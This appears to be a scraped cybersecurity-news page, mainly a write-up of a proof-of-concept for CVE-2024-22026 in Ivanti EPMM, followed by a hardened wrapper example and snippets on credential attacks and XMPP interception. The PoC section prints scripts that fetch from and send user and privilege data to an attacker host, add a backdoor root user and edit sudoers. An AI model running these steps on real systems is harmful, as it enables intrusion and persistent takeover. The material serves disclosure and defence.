Three Android apps on Google Play were used by state-sponsored threat actors to collect intelligence from targeted devices, such as location data and contact lists. […]
BleepingComputer
PoC Exploit Released for Ivanti EPMM MobileIron Core
A newly disclosed vulnerability, CVE-2024-22026, has been found in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.
This vulnerability allows a local attacker to gain root access to affected systems.
The severity of this vulnerability is currently undetermined.
The attack vector for CVE-2024-22026 is local, meaning the attacker must already have local access to the system to exploit the vulnerability, as reported on GitHub.
Once exploited, the attacker can gain root access, which provides full control over the system and can potentially lead to significant security breaches.
The appliance exposes the following CLI command to a low-privilege user for fetching and installing RPM packages:
install rpm url <remote url>
The command is a CLI wrapper around the following, which runs as root:
/bin/rpm -Uvh *.rpm
Any RPM package can be installed this way, because neither the wrapper nor the underlying rpm invocation verifies package signatures or restricts which URLs may be fetched. An attacker can therefore craft a malicious RPM and have the device download and install it.
Exploitation PoC
Creating the Malicious RPM
The following command is used to create a malicious RPM package:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
Preinstall Script (preinstall.sh)
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0
Postinstall Script (postinstall.sh)
#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:<redacted_password>" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0
Running the CLI Command to Fetch the RPM
To exploit the flaw, the attacker runs the following CLI command, which fetches the malicious RPM and installs it as root:
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm
Ivanti has released patches to address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.
Users are strongly recommended to update to these versions to mitigate the risk associated with CVE-2024-22026.
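The root cause above is a privileged wrapper that fetches an arbitrary URL and hands the result to rpm without any signature check. The following added example (not Ivanti's code) shows what a hardened wrapper of this shape looks like: it allows only HTTPS URLs on a host allowlist, downloads without following redirects, requires a GPG signature that rpm can verify, and never passes a shell glob to rpm. The allowlist hosts are constructed placeholders, and it assumes the vendor signing key has already been imported with rpm --import.

```shell
#!/bin/sh
# Hardened replacement for an "install rpm url <remote url>" style wrapper (added example,
# not Ivanti's code). Assumptions: the allowlist below is hypothetical, and the vendor's
# signing key is already imported with "rpm --import" so "rpm -K" can verify against it.
ALLOWED_HOSTS="updates.example.invalid mirror.example.invalid"  # constructed allowlist
STAGING_DIR="${STAGING_DIR:-/var/tmp/rpm-staging}"

# Accept only https:// URLs whose host is on the allowlist; return 1 otherwise.
validate_rpm_url() {
    url="$1"
    case "$url" in
        https://*) ;;
        *) return 1 ;;
    esac
    host="${url#https://}"
    host="${host%%/*}"   # drop the path
    host="${host%%:*}"   # drop an explicit port
    for h in $ALLOWED_HOSTS; do
        [ "$host" = "$h" ] && return 0
    done
    return 1
}

# Require that a signature is present AND that rpm verifies it against imported keys.
# "rpm -qpi" prints "Signature : (none)" for an unsigned package; "rpm -K" exits
# non-zero when the signature is bad or was made with a key that is not imported.
verify_rpm_signature() {
    pkg="$1"
    rpm -qpi "$pkg" 2>/dev/null | grep -q '^Signature *: (none)' && return 1
    rpm -K "$pkg" >/dev/null 2>&1
}

# Fetch, verify, then install as root. The package path is explicit, never a glob like *.rpm.
install_rpm_from_url() {
    url="$1"
    validate_rpm_url "$url" || { echo "refusing URL: $url" >&2; return 1; }
    mkdir -p "$STAGING_DIR" && chmod 700 "$STAGING_DIR"
    pkg=$(mktemp "$STAGING_DIR/pkg.XXXXXX") || return 1
    # --proto =https blocks a downgrade to http; --max-redirs 0 refuses redirects entirely.
    curl --proto '=https' --max-redirs 0 -fsS -o "$pkg" "$url" || { rm -f "$pkg"; return 1; }
    if ! verify_rpm_signature "$pkg"; then
        echo "signature check failed for $url" >&2; rm -f "$pkg"; return 1
    fi
    if rpm -Uvh "$pkg"; then rc=0; else rc=$?; fi
    rm -f "$pkg"
    return $rc
}

if [ $# -eq 1 ]; then install_rpm_from_url "$1"; fi
```

The URL check alone would not have stopped a package the attacker hosts on an allowed mirror, which is why the signature requirement is the control that matters here; the allowlist only narrows the exposure.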
The post PoC Exploit Released for Ivanti EPMM MobileIron Core appeared first on Cyber Security News.
Huge Surge In Attacks Exploiting User Credentials To Hack Enterprises
There are currently billions of compromised credentials available on the Dark Web, making it the easiest route for criminals to exploit legitimate accounts.
Info-stealing malware, which is meant to obtain personally identifiable information such as email addresses, passwords for social networking and messaging apps, bank account information, cryptocurrency wallet data, and more, is expected to increase 266% in 2023.
This indicates that attackers were investing greater resources in identity theft.
Major attacks triggered by attackers using legitimate accounts required approximately 200% more sophisticated response procedures from security teams than the average incident, with defenders having to discern between legitimate and malicious user behavior on the network.
This extensive monitoring of users’ online behavior was made clear when the FBI and European law enforcement took down a global criminal forum in April 2023, gathering the login credentials of over 80 million accounts.
Threats based on identity will probably keep increasing as long as adversaries use generative AI to make their attacks more effective.
“In 2023, we observed over 800,000 posts on AI and GPT across Dark Web forums, reaffirming these innovations have caught cybercriminals attention and interest”, the X-Force Threat Intelligence team said.
Critical infrastructure firms were the target of roughly 70% of attacks. This is a concerning statistic that shows that cybercriminals are betting on these high-value targets’ requirements for uptime to achieve their goals.
Phishing emails, the use of legitimate accounts, and the exploitation of public-facing applications were the causes of over 85% of the attacks.
With DHS CISA reporting that most successful attacks against government agencies, critical infrastructure companies, and state-level government bodies in 2022 featured the use of legitimate accounts, the latter presents a higher risk to the industry.
The report also mentions that the security industry’s traditional view of “basic security” may not be as feasible, as evidenced by the fact that compromise could have been avoided in approximately 85% of attacks on important sectors through the use of patching, multi-factor authentication, or least-privilege principles.
“Our findings reveal that identity is increasingly being weaponized against enterprises, exploiting valid accounts and compromising credentials.
It also shows us that the biggest security concern for enterprises stems not from novel or cryptic threats, but from well-known and existing ones.” reads the report.
According to the data, a startling 50% of cyberattacks in the UK started by using legitimate accounts as the attack vector, and another 25% of cases included using public-facing applications.
According to IBM, attacks resulting from the use of legitimate accounts increased 66% in Europe between the previous year and 2023, making the region the most targeted globally.
The report highlights that nearly a percent of cyberattacks rely on legitimate accounts to gain initial access, which poses serious obstacles to organizations’ efforts to recover.
Businesses need to adopt a strategic approach to counter this danger, incorporating contemporary security practices to reduce risk and fortify their defenses against the ever-changing landscape of cyberattacks.
The post Huge Surge In Attacks Exploiting User Credentials To Hack Enterprises appeared first on Cyber Security News.
Cyber Security News
Researchers Uncover Wiretapping of XMPP-Based Instant Messaging Service
New findings have shed light on what’s said to be a lawful attempt to covertly intercept traffic originating from jabber[.]ru (aka xmpp[.]ru), an XMPP-based instant messaging service, via servers hosted on Hetzner and Linode (a subsidiary of Akamai) in Germany.
"The attacker has issued several new TLS certificates using Let’s Encrypt service which were used to hijack encrypted STARTTLS
The Hacker News | #1 Trusted Cybersecurity News Site